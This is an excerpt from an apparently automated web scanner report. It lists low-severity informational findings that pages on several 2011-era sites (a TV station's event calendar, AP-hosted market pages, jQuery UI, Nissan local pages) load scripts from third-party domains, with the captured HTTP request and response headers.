Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:47:55 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 93
ETag: "3d6eb6d53960a37b95426325a922e95d"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:47:55 GMT; HttpOnly
Content-Length: 43520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.201. http://events.cbs6albany.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /search HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:38:15 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 381
ETag: "3d4a042143386ff03816bdf1f2630c20"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIAIg5sYXN0X3doZW4iACILYnVja2V0RiINbG9jYXRpb257ECIJY2l0eSILQWxiYW55IgtyYWRpdXNpNyINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyITZGlzcGxheV9zdHJpbmciD0FsYmFueSwgTlkiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIgxjb3VudHJ5IhJVbml0ZWQgU3RhdGVzIg5sb25naXR1ZGVmGy03My43NTUwOTk5OTk5OTk5OTkATWoiEXdoZXJlX3N0cmluZ0AZIgpzdGF0ZSIHTlk%3D--d0710e9458c36d53e23b3e7a161be20e00b58652; path=/; expires=Fri, 29-Apr-2011 05:38:15 GMT; HttpOnly
Content-Length: 56757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta name="description" content="Search results" />

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.202. http://events.cbs6albany.com/support/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/support/contact

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6Lc1yAQAAAAAAJ_UKIhg2wqlBgWoIRK7Y1hHFRfK
http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /support/contact HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:42:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 19
ETag: "ccaba8c14b60dabccfaa72fb1c1854ee"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7CDoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05ZOgxyY2NfZXJyIgA%3D--10871e79e903b2058907b0402c06ef0f24c4591b; path=/; expires=Fri, 29-Apr-2011 05:42:57 GMT; HttpOnly
Content-Length: 21713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta name="description" content="Thanks for using WRGB Event Calendar! If you have any comments or questions please contact us using the form below. We'll get back to you as soon as we can." />

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6Lc1yAQAAAAAAJ_UKIhg2wqlBgWoIRK7Y1hHFRfK"> </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.203. http://events.cbs6albany.com/support/content_guidelines previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/support/content_guidelines

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /support/content_guidelines HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:43:47 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 27
ETag: "91a72f0ad435f1101a23b6320cb54e9f"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:43:47 GMT; HttpOnly
Content-Length: 15446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
to find and post events, concerts, festivals, live music, and other things to do near you. Zvents is a free search engine where you can search for what to do by location, time, or event type." />

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.204. http://events.cbs6albany.com/support/help previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/support/help

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /support/help HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:43:22 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 22
ETag: "165f8156655ef6c654db78ed23ee3d2f"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:43:22 GMT; HttpOnly
Content-Length: 23471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
to find and post events, concerts, festivals, live music, and other things to do near you. Zvents is a free search engine where you can search for what to do by location, time, or event type." />

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.205. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.4info.net/js/auto_jump.js

Request

Response

18.206. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.4info.net/js/auto_jump.js

Request

Response

18.207. http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://ibd.morningstar.com/quicktake/standard/client/shell/GetSecList.axd?cn=AP707&ticker=&items=30&pages=10&pageno=0
http://ibd.morningstar.com/quicktake/standard/client/shell/cobrand.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.4info.net/js/auto_jump.js

Request

Response

18.208. http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosted.ap.org
Path:	/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html

Issue detail

The response dynamically includes the following script from another domain:

http://ibd.morningstar.com/AP/graph.js

Request

Response

18.209. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 04:50:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

18.210. http://jqueryui.com/themeroller/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js
http://static.jquery.com/ui/themeroller/scripts/app.js

Request

GET /themeroller/ HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 04:50:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 117007

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
           <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js" type="text/javascript"></script>
           <script src="http://static.jquery.com/ui/themeroller/scripts/app.js" type="text/javascript"></script>
...[SNIP]...

18.211. http://local.nissanusa.com/albany-schenectady-troy-ny-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/albany-schenectady-troy-ny-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:53:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:53:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=12201; expires=Sat, 05-Feb-2011 04:53:18 GMT; path=/
Set-Cookie: localDMA=albany-schenectady-troy-ny-area; expires=Sat, 05-Feb-2011 04:53:18 GMT; path=/
Content-Length: 135768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type='text/javascript' src='http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=D09821"></script>
...[SNIP]...

18.212. http://local.nissanusa.com/albuquerque-santa-fe-area previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.nissanusa.com
Path:	/albuquerque-santa-fe-area

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=D09821
http://www.google.com/jsapi?key=ABQIAAAAreF--TRtzDhS2SyAG8ZvJBThLnoHGpI9aNovItM_LsRLWugGUxTfP7fqFwNd_evJL0mwgSz8NJjTVg

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Sat, 29 Jan 2011 04:57:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 04:57:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localZIP=87101; expires=Sat, 05-Feb-2011 04:57:37 GMT; path=/
Set-Cookie: localDMA=albuquerque-santa-fe-area; expires=Sat, 05-Feb-2011 04:57:37 GMT; path=/
Content-Length: 106522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

